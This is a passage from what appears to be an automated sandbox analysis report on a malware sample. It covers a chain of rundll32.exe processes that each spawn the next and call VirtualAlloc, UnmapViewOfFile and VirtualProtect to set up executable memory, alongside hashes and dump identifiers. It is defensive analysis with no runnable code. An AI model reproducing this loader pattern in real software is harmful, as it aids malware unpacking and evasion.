                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2432 Parent PID: 824 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 20fed0 1174 20feed 1173->1174 1179 20f550 1174->1179 1176 20ff7c 1182 20fb30 VirtualAlloc 1176->1182 1178 20ffb3 1180 20f591 1179->1180 1181 20f5c4 VirtualAlloc 1180->1181 1181->1176 1183 20fb8e 1182->1183 1184 20fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 20fc50 1184->1185 1186 20fd7d 1185->1186 1187 20fd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Function 0020FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0020FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0020FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0020FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2125387365.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1f0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 9fdc4fb799b8dd4d6516937c3b8d9a0b50453db996b821ba7d8b46caca1bdee7
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 77B19A75A00209DFCB48CF84D590AAEB7B5BF88304F208159E915AB396D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0020F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 20f550-20f59b call 20f960 42 20f5aa-20f5da call 20f330 VirtualAlloc 39->42 43 20f59d-20f5a7 call 20f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0020F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2125387365.00000000001F0000.00000040.00000001.sdmp, Offset: 001F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_1f0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: add4b5f7604f8c744e810fa7c8dbaac25557e45ec33ca9fdd35ff973941817fc
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 8A113060D083CDEEEB01DBE884097EEBFB55B11704F044098D5446A283D2BA57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2512 Parent PID: 2432 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 11fed0 1174 11feed 1173->1174 1179 11f550 1174->1179 1176 11ff7c 1182 11fb30 VirtualAlloc 1176->1182 1178 11ffb3 1180 11f591 1179->1180 1181 11f5c4 VirtualAlloc 1180->1181 1181->1176 1183 11fb8e 1182->1183 1184 11fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 11fc50 1184->1185 1186 11fd7d 1185->1186 1187 11fd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Function 0011FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0011FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0011FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0011FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0011FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2135297740.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 9fe7a9c9977b04f471e3bb1298656e988cb35bb49ba124f09ec1847d69351979
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: BDB1BAB5A00109DFCB48CF84D590EAEB7B5BF88304F208169E919AB345D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0011F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 11f550-11f59b call 11f960 42 11f5aa-11f5da call 11f330 VirtualAlloc 39->42 43 11f59d-11f5a7 call 11f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0011F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.2135297740.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_100000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: e55c7decea02c9643cacb10e250befe015d009d3d3098331e5d237864bb570b0
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: C2113360D0828DEEEB01D7E884057EEBFB55B21704F0440A8E5486A282D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2872 Parent PID: 2512 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 18fed0 1174 18feed 1173->1174 1179 18f550 1174->1179 1176 18ff7c 1182 18fb30 VirtualAlloc 1176->1182 1178 18ffb3 1180 18f591 1179->1180 1181 18f5c4 VirtualAlloc 1180->1181 1181->1176 1183 18fb8e 1182->1183 1184 18fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 18fc50 1184->1186 1185 18fd7d 1185->1178 1186->1185 1187 18fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Function 0018FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0018FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0018FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0018FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2147965109.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_170000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 39918c2dbd628486d70b19799d91e5fb63b7c1efa6b54dfaa6c75e8db99e171c
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 67B198B5A00109DFCB48DF84D590AAEB7B5BF88314F208159E919AB355D735EE82CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0018F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 18f550-18f59b call 18f960 42 18f5aa-18f5da call 18f330 VirtualAlloc 39->42 43 18f59d-18f5a7 call 18f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2147965109.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_170000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c61c6a7a7a381565e8d0ea874d5e99c4139e21a27dd140a877b963908e4bed99
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: AD113060D08289EEEB01D7E894097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 3064 Parent PID: 2872 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 12fed0 1174 12feed 1173->1174 1179 12f550 1174->1179 1176 12ff7c 1182 12fb30 VirtualAlloc 1176->1182 1178 12ffb3 1180 12f591 1179->1180 1181 12f5c4 VirtualAlloc 1180->1181 1181->1176 1183 12fb8e 1182->1183 1184 12fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 12fc50 1184->1185 1186 12fd52 VirtualProtect 1185->1186 1187 12fd7d 1185->1187 1186->1185 1187->1178

                                                                      Executed Functions

                                                                      Function 0012FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0012FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0012FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0012FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2157214578.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: a8ef30cf9dc0b6c118dad2a37b8a81712d49dcb17153fe9b9ad23c4ea647f355
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: E8B19A75A00109DFCB48CF84D590EAEB7B5BF88304F208169E919AB355D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0012F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 12f550-12f59b call 12f960 42 12f5aa-12f5da call 12f330 VirtualAlloc 39->42 43 12f59d-12f5a7 call 12f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.2157214578.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 386ac353dc2f027dbf529e201855683646225776c1ed6e9d1923fde277413059
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 6A113060D08289EEEF01D7E894097EEBFB55B21708F0440A8E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 3016 Parent PID: 3064 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 15fed0 1174 15feed 1173->1174 1179 15f550 1174->1179 1176 15ff7c 1182 15fb30 VirtualAlloc 1176->1182 1178 15ffb3 1180 15f591 1179->1180 1181 15f5c4 VirtualAlloc 1180->1181 1181->1176 1183 15fb8e 1182->1183 1184 15fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 15fc50 1184->1186 1185 15fd7d 1185->1178 1186->1185 1187 15fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Function 0015FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0015FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0015FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0015FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2166500104.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_140000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 3678889461ae79ab5f6f2c3c2d704cf9db129a931aaab9b95ad6dc9d99ebf8d0
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 00B199B5A00109DFCB48CF84D590EAEB7B5BF88305F208159E919AB355D735EE86CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0015F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 15f550-15f59b call 15f960 42 15f59d-15f5a7 call 15f960 39->42 43 15f5aa-15f5da call 15f330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0015F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.2166500104.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_140000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: 1fe9891d6473b53fcd1f9a3920e8e36e6697a99bc9a968b10ad4b09f152f81b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: C2113060D08289EEEF01D7E884097EEBFB55B21709F044098E9546B282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 3004 Parent PID: 3016 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 19fed0 1174 19feed 1173->1174 1179 19f550 1174->1179 1176 19ff7c 1182 19fb30 VirtualAlloc 1176->1182 1178 19ffb3 1180 19f591 1179->1180 1181 19f5c4 VirtualAlloc 1180->1181 1181->1176 1183 19fb8e 1182->1183 1184 19fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1186 19fc50 1184->1186 1185 19fd7d 1185->1178 1186->1185 1187 19fd52 VirtualProtect 1186->1187 1187->1186

                                                                      Executed Functions

                                                                      Function 0019FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2176639292.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0019F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 19f550-19f59b call 19f960 42 19f5aa-19f5da call 19f330 VirtualAlloc 39->42 43 19f59d-19f5a7 call 19f960 39->43 43->42
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2176639292.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_180000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c0cf902db63e4ed20e9f4f74eb259fd0881dba2f6be514e3d5abf6831e0be3b3
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: F9113060D08289EEEF01D7E884097EEBFB55B21708F044098E5446A282D3BA5759CBA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 268 Parent PID: 3004 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 14fed0 1174 14feed 1173->1174 1179 14f550 1174->1179 1176 14ff7c 1182 14fb30 VirtualAlloc 1176->1182 1178 14ffb3 1180 14f591 1179->1180 1181 14f5c4 VirtualAlloc 1180->1181 1181->1176 1183 14fb8e 1182->1183 1184 14fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 14fc50 1184->1185 1186 14fd7d 1185->1186 1187 14fd52 VirtualProtect 1185->1187 1186->1178 1187->1185

                                                                      Executed Functions

                                                                      Function 0014FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0014FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0014FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0014FD70
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2187603194.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0014F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 14f550-14f59b call 14f960 42 14f59d-14f5a7 call 14f960 39->42 43 14f5aa-14f5da call 14f330 VirtualAlloc 39->43 42->43
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014F5D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.2187603194.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_130000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
                                                                      • Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
                                                                      • Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Analysis Process: rundll32.exe PID: 2504 Parent PID: 268 rundll32.exeCOMMON

                                                                      Execution Graph

                                                                      Execution Coverage:9.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:13
                                                                      Total number of Limit Nodes:1

                                                                      Graph

                                                                      execution_graph 1173 12fed0 1174 12feed 1173->1174 1179 12f550 1174->1179 1176 12ff7c 1182 12fb30 VirtualAlloc 1176->1182 1178 12ffb3 1180 12f591 1179->1180 1181 12f5c4 VirtualAlloc 1180->1181 1181->1176 1183 12fb8e 1182->1183 1184 12fc15 UnmapViewOfFile VirtualAlloc 1183->1184 1185 12fc50 1184->1185 1186 12fd52 VirtualProtect 1185->1186 1187 12fd7d 1185->1187 1186->1185 1187->1178

                                                                      Executed Functions

                                                                      Function 0012FB30, Relevance: 6.2, APIs: 4, Instructions: 240memoryfileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0012FB75
                                                                      • UnmapViewOfFile.KERNELBASE(?), ref: 0012FC25
                                                                      • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0012FC3F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0012FD70
                                                                      Memory Dump Source
                                                                      • Source File: 00000010.00000002.2197095274.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_16_2_110000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Alloc$FileProtectUnmapView
                                                                      • String ID:
                                                                      • API String ID: 238919573-0
                                                                      • Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction ID: a8ef30cf9dc0b6c118dad2a37b8a81712d49dcb17153fe9b9ad23c4ea647f355
                                                                      • Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
                                                                      • Instruction Fuzzy Hash: E8B19A75A00109DFCB48CF84D590EAEB7B5BF88304F208169E919AB355D735EE92CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0012F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 39 12f550-12f59b call 12f960 42 12f5aa-12f5da call 12f330 VirtualAlloc 39->42 43 12f59d-12f5a7 call 12f960 39->43 43->42
                                                                      APIs
